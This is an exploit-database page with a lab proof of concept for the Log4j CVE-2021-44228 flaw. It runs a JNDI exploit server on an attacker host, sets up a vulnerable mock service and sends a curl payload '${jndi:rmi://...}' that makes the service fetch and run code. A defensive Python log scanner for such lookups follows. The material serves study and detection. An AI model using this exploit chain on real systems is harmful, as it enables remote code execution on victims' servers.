## https://sploitus.com/exploit?id=3B7408B1-9041-550E-9CB8-83E5F609C37B
# cve-2021-44228-log4j
[CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228)
---
# Quickstart
### Concept
- Attacker Server IP: 172.18.5.189
- PRD Server IP: 172.18.5.191
### Step1: Start LDAP/RMI Services. [On Attacker Server]
Download Jar: [JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar](./jar/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar)
Start Services.
```sh
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "172.18.5.189" -C "touch /tmp/cve-2021-44228-log4j"
```

### Step2: Mock a PRD Service. [On PRD Server]
Download Jar: [log4jRCE-0.0.1-SNAPSHOT.jar](jar/log4jRCE-0.0.1-SNAPSHOT.jar)
Run Services.
```sh
java -jar log4jRCE-0.0.1-SNAPSHOT.jar
```
The service runs on port 8080 and logs whatever is sent to the `/login` API.

### Step3: Make a request to PRD Service. [Any Servers]
```sh
curl -X POST 'http://172.18.5.191:8080/login' --data-urlencode 'data=${jndi:rmi://172.18.5.189:1099/spring}'
```
Result:

Temp file has been created.
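
To spot the Step 3 request on the defending side, the following added example (not part of the original repository) scans request or application log lines for the `${jndi:...}` lookup and extracts the callback host and port, so they can be matched against egress records. The function names and the sample log lines are constructed for illustration; the lines reuse the Quickstart addresses.

```python
import re
from urllib.parse import unquote_plus

# Lookup form used in Step 3: ${jndi:<scheme>://<host>[:<port>]/...}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)

# Constructed sample lines (not real logs), using the Quickstart addresses.
SAMPLE_LINES = [
    # form body as curl --data-urlencode puts it on the wire
    'POST /login body="data=%24%7Bjndi%3Armi%3A%2F%2F172.18.5.189%3A1099%2Fspring%7D"',
    # the same value after the application decoded and logged it
    "INFO login data=${jndi:rmi://172.18.5.189:1099/spring}",
    # benign request
    'POST /login body="data=alice"',
]


def find_jndi_lookups(text, max_decode_rounds=3):
    """Return unique (scheme, host, port) tuples for JNDI lookups in text.

    The text is percent-decoded a bounded number of times, because the value
    is form-encoded on the wire and may be encoded again by a proxy or logger.
    """
    hits = []
    for _ in range(max_decode_rounds + 1):
        for m in JNDI_RE.finditer(text):
            port = int(m["port"]) if m["port"] else None
            hit = (m["scheme"].lower(), m["host"], port)
            if hit not in hits:
                hits.append(hit)
        decoded = unquote_plus(text)
        if decoded == text:  # nothing left to decode
            break
        text = decoded
    return hits


def scan(lines):
    """Return (line_number, scheme, host, port) for every flagged line."""
    return [(n, *hit) for n, line in enumerate(lines, 1)
            for hit in find_jndi_lookups(line)]


if __name__ == "__main__":
    for n, scheme, host, port in scan(SAMPLE_LINES):
        print(f"line {n}: JNDI lookup via {scheme} to {host}:{port}")
```

The pattern covers only the literal lookup form shown on this page, so treat a clean scan as a triage result and not as proof that a host was never targeted.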

# Reference
- [welk1n/JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
- [jas502n/Log4j2-CVE-2021-44228](https://github.com/jas502n/Log4j2-CVE-2021-44228)